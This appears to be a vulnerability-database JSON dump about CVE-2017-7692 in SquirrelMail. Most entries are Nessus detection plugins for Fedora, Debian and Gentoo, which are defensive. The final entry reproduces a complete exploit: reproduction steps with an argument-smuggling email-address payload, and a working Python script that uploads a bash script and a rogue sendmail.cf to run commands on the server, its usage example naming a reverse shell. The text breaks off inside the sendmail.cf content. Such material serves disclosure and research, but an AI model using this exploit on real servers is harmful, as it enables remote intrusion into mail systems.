descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-f85c37ae3d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100609);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7692\");\n script_xref(name:\"FEDORA\", value:\"2017-f85c37ae3d\");\n\n script_name(english:\"Fedora 25 : squirrelmail (2017-f85c37ae3d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"fix insufficient escaping of user-supplied data (CVE-2017-7692)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-f85c37ae3d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected squirrelmail package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:squirrelmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"squirrelmail-1.4.22-19.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squirrelmail\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:50:17", "description": "Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.", "edition": 22, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-15T00:00:00", "title": "Debian DSA-3852-1 : squirrelmail - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "modified": "2017-05-15T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:squirrelmail"], "id": "DEBIAN_DSA-3852.NASL", "href": "https://www.tenable.com/plugins/nessus/100166", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3852. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100166);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-7692\");\n script_xref(name:\"DSA\", value:\"3852\");\n\n script_name(english:\"Debian DSA-3852-1 : squirrelmail - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/squirrelmail\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3852\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the squirrelmail packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:1.4.23~svn20120406-2+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squirrelmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"squirrelmail\", reference:\"2:1.4.23~svn20120406-2+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:06:21", "description": "The remote host is affected by the vulnerability described in GLSA-201709-13\n(SquirrelMail: Remote Code Execution)\n\n It was discovered that the sendmail.cf file is mishandled in a popen\n call.\n \nImpact :\n\n A remote attacker, by enticing a user to open an e-mail attachment,\n could execute arbitrary shell commands.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-18T00:00:00", "title": "GLSA-201709-13 : SquirrelMail: Remote Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "modified": "2017-09-18T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:squirrelmail"], "id": "GENTOO_GLSA-201709-13.NASL", "href": "https://www.tenable.com/plugins/nessus/103281", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201709-13.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103281);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-7692\");\n script_xref(name:\"GLSA\", value:\"201709-13\");\n\n script_name(english:\"GLSA-201709-13 : SquirrelMail: Remote Code Execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201709-13\n(SquirrelMail: Remote Code Execution)\n\n It was discovered that the sendmail.cf file is mishandled in a popen\n call.\n \nImpact :\n\n A remote attacker, by enticing a user to open an e-mail attachment,\n could execute arbitrary shell commands.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201709-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Gentoo has discontinued support for SquirrelMail and recommends that\n users unmerge the package:\n # emerge --unmerge 'mail-client/squirrelmail'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:squirrelmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-client/squirrelmail\", unaffected:make_list(), vulnerable:make_list(\"lt 1.4.23_pre20140426\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SquirrelMail\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:15:10", "description": "fix insufficient escaping of user-supplied data (CVE-2017-7692)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-05T00:00:00", "title": "Fedora 24 : squirrelmail (2017-0b6da97aa5)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "modified": "2017-06-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:squirrelmail", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-0B6DA97AA5.NASL", "href": "https://www.tenable.com/plugins/nessus/100603", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0b6da97aa5.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100603);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-7692\");\n script_xref(name:\"FEDORA\", value:\"2017-0b6da97aa5\");\n\n script_name(english:\"Fedora 24 : squirrelmail (2017-0b6da97aa5)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"fix insufficient escaping of user-supplied data (CVE-2017-7692)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0b6da97aa5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected squirrelmail package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:squirrelmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"squirrelmail-1.4.22-19.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squirrelmail\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-19T03:08:01", "description": "Exploit for linux platform in category remote exploits", "edition": 1, "published": "2017-04-20T00:00:00", "type": "zdt", "title": "Squirrelmail 1.4.22 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7692"], "modified": "2017-04-20T00:00:00", "href": "https://0day.today/exploit/description/27626", "id": "1337DAY-ID-27626", "sourceData": "Title: Squirrelmail Remote Code Execution\r\nProduct: Squirrelmail\r\nVersion: 1.4.22 and probably prior\r\nVendor: squirrelmail.org\r\nType: Command Injection\r\nRisk level: 4 / 5\r\nCredit: [email\u00a0protected]\r\nCVE: CVE-2017-7692\r\nVendor notification: 2017-04-04\r\nVendor fix: N/A\r\nPublic disclosure: 2017-04-19\r\n\r\n\r\n\r\n\r\nDETAILS\r\n\r\nSquirrelmail version 1.4.22 (and probably prior) is vulnerable to a remote code execution vulnerability because\r\nit fails to sanitize a string before passing it to a popen call. It's possible to exploit this vulnerability to \r\nexecute arbitrary shell commands on the remote server.\r\n\r\nThe problem is in Deliver_SendMail.class.php on initStream function that uses escapeshellcmd() to sanitize the \r\nsendmail command before executing it. The use of escapeshellcmd() is not correct in this case since it don't \r\nescapes whitespaces allowing the injection of arbitrary command parameters.\r\n\r\n $this->sendmail_command = \"$sendmail_path $this->sendmail_args -f$envelopefrom\"; \r\n $stream = popen(escapeshellcmd($this->sendmail_command), \"w\");\r\n\r\n\r\nThe $envelopefrom variable is controlled by the attacker, hence it's possible to trick sendmail to use an \r\nattacker-provided configuration file that triggers the execution of an arbitrary command.\r\n\r\nIn order to exploit this vulnerability the MTA in use must be sendmail and Squirrelmail must be configured\r\nto use it as commandline (useSendmail directive of the config file set to true).\r\nAlso, the edit_identity directive of the config file must be bet to true, but this is the default configuration.\r\n\r\nTo reproduce the issue follow these steps:\r\n 1. Create a rogue sendmail.cf that triggers the execution of a /usr/bin/touch:\r\n [...]\r\n Mlocal, P=/usr/bin/touch, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,\r\n T=DNS/RFC822/X-Unix,\r\n A=X /tmp/executed\r\n 2. Upload it as a mail attachment and get it's remote name (ex: lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD)\r\n 3. Go to Options -> Personal Informations and set the following payload as Email Address:\r\n <[email\u00a0protected] -OQueueDirectory=/tmp -C /var/local/squirrelmail/attach/lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD>\r\n 4. Send an email\r\n 5. Verify the execution of the command with \"ls /tmp/executed\" on the remote server\r\n\r\n\r\n\r\n\r\nPROOF OF CONCEPT\r\n\r\nThe followig python script exploits this vulnerability to execute an attacker provided bash script on the remote server.\r\n\r\nBOF\r\n#!/usr/bin/env python\r\n# -*- coding: utf-8 -*- \r\n\r\n\"\"\"\r\n\r\nSquirrelMail 1.4.22 Remote Code Execution (authenticated) \r\nExploit code for CVE-2017-7692\r\n[email\u00a0protected]\r\n\r\n\"\"\"\r\n\r\nfrom __future__ import unicode_literals\r\nimport sys\r\nimport os\r\nimport re\r\nimport requests\r\n\r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\n\r\n\r\nSENDMAILCF=\"/tmp/squirrelmail1_4_22-sendmailcf-rce\"\r\nCOMPOSE = \"/src/compose.php\"\r\nINFOS = \"/src/options.php?optpage=personal\"\r\nSQM_ATTACH_PATH = \"/var/local/squirrelmail/attach/\"\r\n# must be enclosed in <> otherwise spaces will be removed ..\r\nSENDER = \"<[email\u00a0protected] -OQueueDirectory=/tmp -C %s%s>\"\r\n\r\n\r\nSESSID = \"\"\r\nBASEURL = \"\"\r\n\r\n\r\ndef attach(attachment):\r\n url = \"%s%s\" % (BASEURL, COMPOSE)\r\n token = get_csrf_token(url)\r\n\r\n values = {\r\n \"smtoken\": token,\r\n \"attach\": \"add\"\r\n }\r\n\r\n try:\r\n files = {'attachfile': open(attachment,'rb')}\r\n resp = requests.post(url, files=files, data=values, cookies={'SQMSESSID':SESSID})\r\n fname = re.search(r'att_local_name\";s:[0-9]+:\"([a-zA-Z0-9]+)\"', resp.text)\r\n if not fname:\r\n print \"\\nError: unable to upload file %s\" % attachment\r\n return fname.group(1)\r\n\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n\r\n\r\ndef send():\r\n url = \"%s%s\" % (BASEURL, COMPOSE)\r\n token = get_csrf_token(url)\r\n\r\n values = {\r\n \"smtoken\": token,\r\n \"send_to\": \"root\",\r\n \"send\": \"Send\"\r\n }\r\n\r\n try:\r\n resp = requests.post(url, data=values, cookies={'SQMSESSID':SESSID})\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n\r\n\r\ndef set_identity(sender):\r\n url = \"%s%s\" % (BASEURL, INFOS)\r\n token = get_csrf_token(url)\r\n values = {\r\n \"smtoken\": token,\r\n \"optpage\": \"personal\",\r\n \"optmode\": \"submit\",\r\n \"new_email_address\": sender,\r\n \"submit_personal\": \"Submit\"\r\n }\r\n\r\n try:\r\n requests.post(url, data=values, cookies={'SQMSESSID':SESSID})\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n\r\n\r\ndef get_csrf_token(url):\r\n try:\r\n body = requests.get(url, cookies={'SQMSESSID':SESSID}).text\r\n inp = re.search(r'<input.*name=\"smtoken\".*>', body, re.MULTILINE)\r\n token = re.search(r'value=\"([a-zA-Z0-9]+)\"', inp.group(0))\r\n if token:\r\n return token.group(1)\r\n except Exception as e:\r\n pass\r\n\r\n print \"\\nUnable to get CSRF token\"\r\n sys.exit(1)\r\n\r\ndef outw(s):\r\n sys.stdout.write(s)\r\n sys.stdout.flush()\r\n\r\ndef main(argv):\r\n global BASEURL\r\n global SESSID\r\n\r\n if len(argv) != 4:\r\n print (\r\n \"SquirrelMail 1.4.22 Remote Code Execution (authenticated) - [email\u00a0protected]\\n\"\r\n \"The target server must use sendmail and squirrelmail must be configured to use /usr/bin/sendmail\\n\"\r\n \"Usage:\\n\"\r\n \" %s <url> <session_id> <script>\\n\"\r\n \" url: the url of squirrelmail\\n\"\r\n \" session_id: the value of SQMSESSID cookie\\n\"\r\n \" script: the path to the bash script to be executed on the target\\n\"\r\n \"Example:\\n\"\r\n \" %s http:/example.com/squirrelmail/ l2rapvcovsui1on0b4i5boev24 reverseshell.sh\"\r\n ) % (argv[0], argv[0])\r\n\r\n sys.exit(1)\r\n\r\n BASEURL = argv[1]\r\n SESSID = argv[2]\r\n script = argv[3]\r\n\r\n outw(\"Uploading script ... \")\r\n script_fname = attach(script)\r\n print \"ok\"\r\n\r\n\r\n outw(\"Generating sendmail.cf ... \")\r\n try:\r\n script_path = \"%s%s\" % (SQM_ATTACH_PATH, script_fname)\r\n with open(SENDMAILCF, 'w') as f:\r\n f.write(SENDMAILCF_CONTENT % script_path)\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n print \"ok\"\r\n\r\n outw(\"Uploading sendmail.cf ... \")\r\n smc_fname = attach(SENDMAILCF)\r\n os.remove(SENDMAILCF)\r\n print \"ok\"\r\n\r\n outw(\"Updating user options ... \")\r\n sender = SENDER % (SQM_ATTACH_PATH, smc_fname)\r\n set_identity(sender)\r\n print \"ok\"\r\n\r\n outw(\"Checking identity field ... \")\r\n icheck = requests.get(\"%s%s\" % (BASEURL, INFOS), cookies={'SQMSESSID':SESSID}).text\r\n if not smc_fname in icheck:\r\n print \"\\nError: unable to set identity field .. maybe squirrelmail is configured with edit_identity=false\"\r\n sys.exit(1)\r\n print \"ok\"\r\n\r\n outw(\"Executing script ... \")\r\n send()\r\n print \"ok\\n\"\r\n sys.exit(0)\r\n\r\nSENDMAILCF_CONTENT = \"\"\"\r\nO DontBlameSendmail=,AssumeSafeChown,ForwardFileInGroupWritableDirPath,GroupWritableForwardFileSafe,GroupWritableIncludeFileSafe,IncludeFileInGroupWritableDirPath,DontWarnForwardFileInUnsafeDirPath,TrustStickyBit,NonRootSafeAddr,GroupWritableIncludeFile,GroupReadableDefaultAuthInfoFile\r\nKdequote dequote\r\nScanonify=3\r\n[email\u00a0protected] [email\u00a0protected] <@>\r\nR$* $: $1 <@> mark addresses\r\nR$* < $* > $* <@> $: $1 < $2 > $3 unmark <addr>\r\n[email\u00a0protected] $* <@> $: @ $1 unmark @host:...\r\nR$* [ IPv6 : $+ ] <@> $: $1 [ IPv6 : $2 ] unmark IPv6 addr\r\nR$* :: $* <@> $: $1 :: $2 unmark node::addr\r\nR:include: $* <@> $: :include: $1 unmark :include:...\r\nR$* : $* [ $* ] $: $1 : $2 [ $3 ] <@> remark if leading colon\r\nR$* : $* <@> $: $2 strip colon if marked\r\nR$* <@> $: $1 unmark\r\nR$* ; $1 strip trailing semi\r\nR$* < $+ :; > $* [email\u00a0protected] $2 :; <@> catch <list:;>\r\nR$* < $* ; > $1 < $2 > bogus bracketed semi\r\n[email\u00a0protected] [email\u00a0protected] :; <@>\r\nR$* $: < $1 > housekeeping <>\r\nR$+ < $* > < $2 > strip excess on left\r\nR< $* > $+ < $1 > strip excess on right\r\nR<> [email\u00a0protected] < @ > MAIL FROM:<> case\r\nR< $+ > $: $1 remove housekeeping <>\r\n[email\u00a0protected] $+ , $+ $2\r\n[email\u00a0protected] [ $* ] : $+ $2\r\n[email\u00a0protected] $+ : $+ $2\r\nR $+ : $* ; @ $+ [email\u00a0protected] $>Canonify2 $1 : $2 ; < @ $3 > list syntax\r\nR $+ : $* ; [email\u00a0protected] $1 : $2; list syntax\r\nR$+ @ $+ $: $1 < @ $2 > focus on domain\r\nR$+ < $+ @ $+ > $1 $2 < @ $3 > move gaze right\r\nR$+ < @ $+ > [email\u00a0protected] $>Canonify2 $1 < @ $2 > already canonical\r\nR$- ! $+ [email\u00a0protected] $>Canonify2 $2 < @ $1 .UUCP > resolve uucp names\r\nR$+ . $- ! $+ [email\u00a0protected] $>Canonify2 $3 < @ $1 . $2 > domain uucps\r\nR$+ ! $+ [email\u00a0protected] $>Canonify2 $2 < @ $1 .UUCP > uucp subdomains\r\nR$* %% $* $1 @ $2 First make them all @s.\r\nR$* @ $* @ $* $1 %% $2 @ $3 Undo all but the last.\r\nR$* @ $* [email\u00a0protected] $>Canonify2 $1 < @ $2 > Insert < > and finish\r\nR$* [email\u00a0protected] $>Canonify2 $1\r\nSCanonify2=96\r\nR$* < @ localhost > $* $: $1 < @ $j . > $2 no domain at all\r\nR$* < @ localhost . $m > $* $: $1 < @ $j . > $2 local domain\r\nR$* < @ localhost . UUCP > $* $: $1 < @ $j . > $2 .UUCP domain\r\nR$* < @ [ $+ ] > $* $: $1 < @@ [ $2 ] > $3 mark [addr]\r\nR$* < @@ $=w > $* $: $1 < @ $j . > $3 self-literal\r\nR$* < @@ $+ > $* [email\u00a0protected] $1 < @ $2 > $3 canon IP 